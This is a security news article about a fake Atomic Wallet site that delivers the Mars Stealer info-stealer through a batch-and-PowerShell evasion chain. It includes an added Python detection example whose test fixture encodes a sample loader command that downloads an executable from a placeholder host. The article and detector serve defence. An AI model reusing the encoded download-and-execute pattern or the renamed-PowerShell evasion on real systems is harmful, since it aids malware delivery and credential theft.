atomic wallet, cryptocurrency, information stealer, mars stealer, password stealing trojan, powershell, wallet, android

A fake website impersonating the official portal for the Atomic wallet, a popular decentralized wallet that also operates as a cryptocurrency exchange portal, is, in reality, distributing copies of the Mars Stealer information-stealing malware.

The phony website was disclosed by a malware researcher known as Dee on Monday, but at the time of writing it remains online and is still serving copies of the malware.

Seeing the genuine and fake websites side by side reveals that the latter isn’t a faithful copy of the former, but it’s still using the official logos, themes, marketing images, and structure. The fake site even features a contact form, email address, and FAQ section.

However, those unfamiliar with the legitimate Atomic wallet site could easily believe that the imposter is authentic.


Genuine site left, fake site right

As for how people end up there, it might be through malvertising on social media, direct messages on various platforms, SEO poisoning, or spam email.

Visitors attempting to download the software are presented with three buttons for Windows, iOS, and Android versions.


The download page on the fake site

Clicking on iOS does nothing, and clicking the Google Play button redirects to the real Atomic Wallet app on the Play Store.

However, clicking on the Windows button will download a ZIP file named “Atomic Wallet.zip,” which contains malicious code that installs the Mars Stealer infection.

Mars Stealer is a recently emerged info-stealer that targets account credentials stored in web browsers, cryptocurrency extensions and wallets, and two-factor authentication plugins.

In March, we reported on Mars Stealer being distributed by malvertising campaigns on Google Ads that abused the OpenOffice brand.

Evading detection

According to a technical report published by Cyble yesterday, the delivery mechanism in the ongoing Mars Stealer campaign is characterized by a notable effort to evade detection.

The ZIP contains a batch file (AtomicWallet-Setup.bat) that invokes a PowerShell command to elevate its privileges on the host.

Next, the bat file copies the PowerShell executable (powershell.exe) into the same directory, renames and hides the copy, and then uses it to execute base64-encoded PowerShell content.


Contents of the included bat file (Cyble)

This content decodes, decrypts, and decompresses a Base64-encoded, AES-encrypted, GZip-compressed payload and then executes the resulting PowerShell script, which acts as the malware loader.


Code for decryption and decompression (Cyble)

The loader downloads a copy of Mars Stealer from a Discord server and drops it in %LOCALAPPDATA% on the host machine. After installation, the malware launches and begins stealing data from the now-infected device.
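The delivery chain above (a .bat launching a renamed copy of powershell.exe with a base64-encoded command that unpacks a loader and fetches the stealer from Discord) leaves several tell-tale marks in process-creation telemetry. The following added example, not code from the article or from Cyble's report, triages constructed Sysmon-style events for exactly those marks; the event values, the `ps_renamed.exe` file name, and the `cdn.discordapp.invalid` URL are hypothetical.

```python
import base64
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (hypothetical, not Cyble's sample): a benign
# admin session, then a renamed powershell.exe spawned by cmd.exe (the .bat) with an encoded command.
ENCODED_LOADER = base64.b64encode((
    "$g=New-Object IO.Compression.GZipStream;[Security.Cryptography.Aes]::Create();"
    "Invoke-WebRequest https://cdn.discordapp.invalid/m.exe -OutFile $env:LOCALAPPDATA\\m.exe"
).encode("utf-16-le")).decode()

EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"Image": r"C:\Users\victim\Downloads\Atomic Wallet\ps_renamed.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"ps_renamed.exe -nop -w hidden -ec {ENCODED_LOADER}"},
]

ENC_FLAG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
LOADER_MARKERS = ("gzipstream", "frombase64string", "cryptography.aes", "discordapp")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage_event(ev):
    """Return a list of findings for one process-creation event (empty means clean)."""
    findings = []
    image = PureWindowsPath(ev["Image"]).name.lower()
    parent = PureWindowsPath(ev["ParentImage"]).name.lower()
    # PE version info survives a rename: OriginalFileName still says PowerShell.EXE.
    if ev.get("OriginalFileName", "").lower() == "powershell.exe" and image != "powershell.exe":
        findings.append(f"renamed powershell.exe running as {image}")
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        findings.append("encoded PowerShell command")
        hits = [k for k in LOADER_MARKERS if k in decoded.lower()]
        if hits:
            findings.append("decoded payload references " + ", ".join(hits))
        if parent == "cmd.exe":
            findings.append("encoded command launched from cmd.exe (batch-file chain)")
    return findings
```

Feeding real Sysmon Event ID 1 records into `triage_event` requires only mapping the XML fields to the same keys; the decoded-payload check is what separates this chain from routine encoded PowerShell used by management tooling.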


Downloading Mars Stealer from Discord (Cyble)

How to stay safe

When downloading cryptocurrency wallets, it is vital to make sure you are using the official download portal of the project and never trust links provided on social media or instant messaging platforms.

Also, beware of SEO poisoning and malicious Google Ads campaigns that can make malicious websites rank higher than the official sites in Google Search results, so skip all results marked as ads.
